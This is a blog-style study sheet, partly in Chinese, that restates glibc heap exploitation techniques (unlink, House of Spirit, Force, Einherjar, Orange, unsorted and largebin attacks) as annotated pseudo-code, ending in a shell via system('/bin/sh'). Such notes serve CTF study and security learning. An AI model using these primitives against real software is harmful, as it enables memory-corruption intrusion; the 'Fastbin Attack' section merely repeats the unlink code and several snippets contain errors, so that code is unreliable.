Mid Station

The Glibc Heap Playbook (Preview)

又是适逢其时的春困。日复滋长的赖床时间和廉价咖啡因并未能击退积怨已久的黑眼圈,也只能寄希望于冷水澡和堆砌文字的无用功了。

上周读到一篇非常优秀的论文:Automatic Techniques to Systematically Discover New Heap Exploitation Primitives, 主要介绍了作者如何在各种堆管理器中自动化寻找攻击利用技巧的工作。虽然对于具体实现部分还没有完全理解透彻,但文中对于利用技巧的表述令人眼前一亮。由于本菜鸟对glibc堆的漏洞利用长期停留在上来就fastbin attack的水平,每次遇到此类题目都会花大量时间来做英文阅读理解(主要是how2heap),即使一眼看出漏洞也要半天才能确认攻击方向动手写exp。
对于这种非智力差异导致的战术性缺口,除了多做总结整理也没别的方法了。于是花了几天时间,选取how2heap上面常见的攻击方式按照论文提供的格式重新整理出The Glibc Heap Playbook预览版。

注意:以下所有代码的主要目的是描述漏洞的利用方法,并不能进行编译测试。

首先来观摩一下上面介绍的论文当中关于Unlink攻击方法的表示:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
// [PRE-CONDITION]
// sz: any non-fast-bin size
// dst: where to write (void*)
// val: target value (ptr to writable memory)
// [BUG] buffer overflow (p1)
// [POST-CONDITION] *dst = val
void *p1 = malloc(sz);
void *p2 = malloc(sz);

struct malloc_chunk *fake = p2;
// bypassing (1): P->size == next_chunk(P)->prev_size
fake->size = sizeof(void*);
// bypassing (2): P->fd->bk == P && P->bk->fd == P
fake->fd = (void*)&p1 - offsetof(struct malloc_chunk, bk);
fake->bk = (void*)&p2 - offsetof(struct malloc_chunk, fd);

struct malloc_chunk *c2 = raw_to_chunk(p2);

// [BUG] overflowing p1: it shrinks the previous chunk's size,
// tricking 'fake' as the previous chunk
c2->prev_size = chunk_size(sz) - offsetof(struct malloc_chunk, fd);
// tricking the previus chunk freed, P bit = 0
c2->size &= ~1;
// triggering unlink(fake) via backward consolidation
free(p2);

assert(p1 == (void*)&p1 - offsetof(struct malloc_chunk, bk));
// writing with p1: overwriting itself to dst
*(void**)(p1 + offsetof(struct malloc_chunk, bk)) = dst;
// writing with p1: overwriting *dst with val
*(void**)p1 = (void*)val;

assert(*dst == val);

比起how2heap上面的PoC清楚太多了。
OK, 以下进入本人不负责任编写部分。

Fastbin Attack

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
// [PRE-CONDITION]
// sz: any non-fast-bin size
// dst: where to write (void*)
// val: target value (ptr to writable memory)
// [BUG] buffer overflow (p1)
// [POST-CONDITION] *dst = val
void *p1 = malloc(sz);
void *p2 = malloc(sz);

struct malloc_chunk *fake = p2;
// bypassing (1): P->size == next_chunk(P)->prev_size
fake->size = sizeof(void*);
// bypassing (2): P->fd->bk == P && P->bk->fd == P
fake->fd = (void*)&p1 - offsetof(struct malloc_chunk, bk);
fake->bk = (void*)&p2 - offsetof(struct malloc_chunk, fd);

struct malloc_chunk *c2 = raw_to_chunk(p2);

// [BUG] overflowing p1: it shrinks the previous chunk's size,
// tricking 'fake' as the previous chunk
c2->prev_size = chunk_size(sz) - offsetof(struct malloc_chunk, fd);
// tricking the previus chunk freed, P bit = 0
c2->size &= ~1;
// triggering unlink(fake) via backward consolidation
free(p2);

assert(p1 == (void*)&p1 - offsetof(struct malloc_chunk, bk));
// writing with p1: overwriting itself to dst
*(void**)(p1 + offsetof(struct malloc_chunk, bk)) = dst;
// writing with p1: overwriting *dst with val
*(void**)p1 = (void*)val;

assert(*dst == val);

House of Spirit

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
// [PRE-CONDITION]
// sz: fast-bin size
// dst: where to allocate fake chunk
// [BUG] Arbitrary Free
// [POST-CONDITION] malloc(sz) == dst

void *p1 = malloc(1);

struct malloc_chunk *fake_chunk = raw_to_chunk(dst);
struct malloc_chunk *fake_next = raw_to_chunk(dst + malloc_size_to_chunk_size(sz));

// bypass size check "free(): invalid size"
fake_chunk->size = malloc_size_to_chunk_size(sz);
// bypass "free(): invalid next size (fast), no need for fastbin size, > 2*SIZE_SZ(16 on x64) && < av->system_mem(<128kb)"
fake_nex->size = sz + 0x1234;

// [BUG] Arbitrary Free
free(dst);

void* victim = malloc(sz);
assert(victim == dst)

House of Lore

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
// [PRE-CONDITION]
// [TACTIC 1] sz1: (smallbin size) OR
// [TACTIC 2] sz2a: (fastbin size) and sz2b: (largebin size)
// dst: where to allocate fake chunk, dst2: where to place fake->fd chunk to bypass check
// [BUG] Use-After-Free
// [POST-CONDITION] malloc(sz) == dst

// !!CHOOSE [TACTIC 1] OR [TACTIC 2] BASED ON SIZE PRECONDITION!!
// [TACTIC 1]: directly create smallbin chunk
void *p1 = malloc(sz1);
// prevent merge with top chunk
void *junk1 = malloc(0x10);
free(p1);
// now p1 at unsortedbin, malloc sz1a > sz1 to make p1 get into smallbin
void *junk2 = malloc(sz1a)
// now p1 at smallbin
// [TACTIC 1] end.

// [TACTIC 2]: use fastbin and largebin to create smallbin
void *p1 = malloc(sz2a);
// prevent merge with top chunk
void *junk = malloc(0x10);
free(p1);
// now p1 at fastdbin, malloc sz2b in largebin size to make p1 get into smallbin
void *junk2 = malloc(sz2b);
// now p1 at smallbin
// [TACTIC 2] end.

struct malloc_chunk *fake = raw_to_chunk(dst);
struct malloc_chunk *fake2 = raw_to_chunk(dst2);
// bypass 'p1->bk->fd == p1' check
fake->fd = p1;
// bypass 'fake->bk->fd == fake' check
fake->bk = fake2;
fake2->fd = fake;

// [BUG] Use-After-Free: Overwrite p1->bk when it's on smallbin.
p1->fd = fake;

void *junk2 = malloc(sz1); // or sz2a
void *victim = malloc(sz1); // or sz2a
assert(victim == dst)

House of Force

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
// [PRE-CONDITION]
// sz: aribitrary size
// dst: where to allocate fake chunk
// [BUG] Arbitrary Free
// [POST-CONDITION] malloc(sz) == dst

void *p1 = malloc(sz);

struct malloc_chunk *top_chunk = raw_to_chunk(p1 + malloc_size_to_chunk_size(sz));
// [BUG] Heap Overflow: overwrite top_chunk->size.
top_chunk->size = -1;
// Might result in integer overflow, doesn't matter.
size_t request_size = dst - top_chunk - 2*sizeof(size_t) - sizeof(size_t);

void* victim = malloc(request_size);
assert(victim == dst)

House of Einherjar

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
// [PRE-CONDITION]
// sz: (smallbin size)
// dst: where to allocate fake chunk
// [BUG] Off-by-one Null
// [POST-CONDITION] malloc(sz) == dst

// The chunk to perform off-by-one null,
// usually chose the size which ((sz1+8) % 0x10 == 0), e.g. 0x38.
void* p1 = malloc(sz1);
size_t real_p1_size = malloc_usable_size(p1);

struct malloc_chunk *fake = raw_to_chunk(dst);
// bypass P->bk->size = P->prev_size, any smallbin size is ok.
fake->prev_size = 0x100; // dst-0x10
fake->size = 0x100; // dst-0x8
fake->fd = fake; // dst
fake->bk = fake; // dst+0x8
fake->fd_size = fake; // dst+0x10
fake->bk_size = fake; // dst+0x18

// 0xf8 is easier, because the p2->size will be 0x101,
// we can use off-by-one null change it to 0x100,
// other value like 0x1f8, 0x2f8 is also convenient,
// but other value will require another fake chunk forge in this chunk.
void *p2 = malloc(0xf8);

// [BUG] Off-by-one null, change p2->size from 0x101 to 0x100
p1[real_p1_size] = 0; //p1[0x38] = 0

// write fake p2->prev_size to end of p1
size_t fake_size = p2-sizeof(size_t)*2 - fake; // fake_size = p2-0x10-fake;
*(size_t*)&p1[real_p1_size-sizeof(size_t)] = fake_size; // p1[0x38-8] = fake_size

// change fake->size according to calculated fake_size
fake->size = fake_size;
// free p2 and it will consolidate with our fake chunk
free(p2);

// malloc any size
void* victim = malloc(0x40);

assert(victim == dst);

House of Orange (Phase 1)

There are two phase in House of Orange, phase 1 is about creating an unsorted bin chunk without using free, phase two is about using unsortedbin attack to hijack control flow.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
// [PRE-CONDITION]
// sz: sz large enough
// [BUG] Heap Overflow
// [POST-CONDITION]
// A chunk in unsortedbin

// origin top_chunk->size usually is 0x21000,
// after allocating a size of 0x400,
// top_chunk->size = 0x20c01
void *p1 = malloc(0x400-0x10);

// [BUG] Heap Overflow: overwrite top_chunk->size
struct malloc_chunk *top_chunk = raw_to_chunk(p1 + 0x400);
// two conditions should be satisfy:
// 1. Top chunk + size has to be page aligned
// 2. Top chunk's prev_inuse bit has to be set
top_chunk->size = 0xc01

// sz > top_chunk->size (new)
malloc(sz); // malloc(0x1000)

assert(is_in_unsortedbin(top_chunk) == True)

House of Orange (Phase 2)

The tactic can be used to bypass vtable check added in 2.24.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
// [PRE-CONDITION]
// sz: any non-fastbin size
// [BUG] Heap Overflow
// [POST-CONDITION]
// call system('/bin/sh')
void *p1 = malloc(sz);
void *p2 = malloc(sz);
//avoid merge
malloc(0x10);

// move p2 to the unsorted bin
free(p2);

struct malloc_chunk *chunk2 = raw_to_chunk(p2);
_IO_FILE *fp = (_IO_FILE*) fp;
// [BUG] Heap Overflow p1 to overwrite p2's metadata
fp->flags = 0; // chunk2->prev_size; chunk2+0x0
fp->_IO_read_ptr = 0x61; // chunk2->size; chunk2+0x8

// Following overwrite can be done by UAF
fp->_IO_read_base = _IO_list_all-0x10; // chunk2+0x18; libc.symbols['_IO_list_list']
fp->_IO_write_base = 0; // chunk2+0x20
fp->_IO_write_ptr = 1; // chunk2+0x28
fp->_IO_buf_base = &bin_sh; // chunk2+0x38; next(libc.search('/bin/sh'))
fp->_mode = 0; // chunk2+0xc0
chunk2+0xd8 = _IO_str_jumps - 8; // fp_plus->vtable
chunk2+0xe8 = system // chunk2+0xe8

// trigger, error message printed but still can get shell.
malloc(0x10);

// get shell!

Appendix: How to Find _IO_str_jumps

1
2
3
4
5
6
7
8
pwndbg> p _IO_str_underflow
$1 = {<text variable, no debug info>} 0x7f4d4cf04790 <_IO_str_underflow>
pwndbg> search -p 0x7f4d4cf04790
libc.so.6 0x7f4d4d2240a0 0x7f4d4cf04790
libc.so.6 0x7f4d4d224160 0x7f4d4cf04790
libc.so.6 [0x7f4d4d2245e0] 0x7f4d4cf04790
pwndbg> p &_IO_file_jumps
$2 = (<data variable, no debug info> *) 0x7f4d4d224440 <_IO_file_jumps>

_IO_str_jumps < _IO_file_jumps, so last entry of the search is what we want.
_IO_str_jumps = 0x7f4d4d2245e0 - 0x20 = 0x7f4d4d2245c0

Unsortedbin Into Stack

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
// [PRE-CONDITION]
// sz: any non-fastbin size
// [BUG] Heap Overflow
// [POST-CONDITION]
// malloc(sz) == dst + offsetof(struct malloc_chunk, fd)
void *p1 = malloc(sz);
void *p2 = malloc(sz);
//avoid merge
malloc(0x10);

// move p2 to the unsorted bin
free(p2);

// create a fake chunk at dst
struct malloc_chunk *fake = dst;
// set fake->size to be the chunk size of the last allocation
fake->size = malloc_size_to_chunk_size(sz);
// set fake->bk to any writable address to avoid crash
fake->bk = fake;

// [BUG] Heap Overflow p1
struct malloc_chunk *c2 = raw_to_chunk(p2);
// size should be smaller than the next allocation size
// to avoid returning c2 in the next alloction
// size shouldn't be too small:
// bypass size>2*SIZE_SZ (>16 on x64) && size < av->system_mem.
c2->size = 2 * sizeof(size_t)
// set the next pointer in the unsorted bin
c2->bk = fake;

// now unsorted bin: c2 -> fake,
// and c2 is too small for the request.
// therefore, next allocation returns the fake chunk
assert(malloc(sz)) == fake + offsetof(struct malloc_chunk, fd));

Unsoredbin Attack

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
// [PRE-CONDITION]
// sz: non-fastbin size
// dst: where to overwrite
// [BUG] Use-After-Free
// [POST-CONDITION] *dst -> large value (e.g. 0x7ffff7dd1b78)

void *p1 = malloc(sz);
// avoid merge with top chunk
void *p2 = malloc(0x10);

// p1 gets into unsortedbin.
free(p1);
struct malloc_chunk *chunk1 = raw_to_chunk(p1);
size_t target_value = chunk1->fd; // (e.g. 0x7ffff7dd1b78)
// [BUG] Use-After-Free: overwrite p1->bk while it's in unsortedbin.
// x64: dst-0x10, x32: dst-0x8;
// chunk1->bk: p1+0x10
chunk1->bk = dst-0x10

void *p3 = malloc(sz);
assert(*dst == target_value);

Largebin Attack

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
// [PRE-CONDITION]
// sz1: largebin size, sz2: largebin size, sz1 < sz2
// dst1, dst2: where to overwrite
// [BUG] Heap Overflow
// [POST-CONDITION] *dst1, *dst2 -> heap_address (e.g. 0x4057a0)

void *p1 = malloc(sz1);
malloc(0x10); // avoid merge
// sz1 < sz2
void *p2 = malloc(sz2);
malloc(0x10); // avoid merge
void *p3 = malloc(sz2);
malloc(0x10); // avoid merge

free(p1);
free(p2);
// put p1,p2 in unsortedbin:
// unsortedbin_list->p2->p1

// malloc a size smaller than largebin size
malloc(0x90);
// allocate space from p1, now p2 is in larginbin and p1_remain in unsortedbin:
// largebin_list->p2; unsortedbin_list->p1_remain;

free(p3);
// put p3 in unsortedbin:
// unsortedbin_list->p3->p1_reamin;

struct malloc_chunk *chunk2 = raw_to_chunk(p2);
// [BUG] Heap Overflow or Overlap Chunk
// change chunk2->size smaller than its origin value, even 0 is ok.
chunk2->size = new_size; // new_size < chunk2->size, 0 is ok
chunk2->fd = 0;
chunk2->bk = 0;
chunk2->fd_size = dst1 - 0x10;
chunk2->fd_size = dst2 - 0x20;

// malloc a size smaller than largebin size
malloc(0x90);

// dst1 & dst2 has been overwritten with a heap address.
assert(*dst1 == heap_address);
assert(*dst2 == heap_address);